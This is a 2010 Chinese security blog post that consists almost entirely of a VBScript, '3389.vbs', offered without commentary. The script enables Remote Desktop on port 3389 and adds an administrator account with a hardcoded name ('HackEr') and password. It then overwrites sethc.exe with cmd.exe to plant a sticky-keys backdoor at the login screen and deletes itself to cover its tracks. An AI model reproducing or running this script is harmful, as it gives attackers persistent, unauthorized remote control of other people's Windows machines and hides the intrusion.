分类

学习笔记 [17]
渗透测试 [4]
一些杂文 [14]
coding [16]
漏洞信息 [17]
技术文章 [15]
开发文档 [8]
个人作品 [5]
PS:个人作品在各种下载栏目均有下载

站内搜索

日历

«  April 2010  »
Su Mo Tu We Th Fr Sa
    123
45678910
11121314151617
18192021222324
252627282930

友情链接

  • 莫良博客
  • 冷夜博客
  • 八神博客
  • Tm3yShell7
  • 2idy电影网
  • Blueandhack's Blog
  • 幻泉博客
  • 羽蛇
  • Elaf
  • 小冰's Blog

    • 访问统计(起于2010/10/2)

    访问统计
    PortWatcher's Blog
    Monday, 2025-06-30, 7:06 PM
    Welcome Guest
    Main | Registration | Login | RSS

    Blog

    Main » 2010 » April » 20 » 3389.vbs
    1:09 PM
    3389.vbs
    on error resume next
    const HKEY_LOCAL_MACHINE = &H80000002
    strComputer = "."
    Set StdOut = WScript.StdOut
    Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
    strComputer & "\root\default:StdRegProv")
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
    oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
    oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
    strValueName = "fDenyTSConnections"
    dwValue = 0
    oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
    strValueName = "PortNumber"
    dwValue = 3389
    oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
    strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
    strValueName = "PortNumber"
    dwValue = 3389
    oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
    on error resume next
    dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
    On Error Resume Next
    Dim obj, success
    Set obj = CreateObject("WScript.Shell")
    success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
    CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
    Category: coding | Views: 825 | Added by: Jury | Tags: 3389 vbs | Rating: 3.0/1
    Total comments: 0
    Name *:
    Email *:
    Code *:

    admin@portwatcher.net |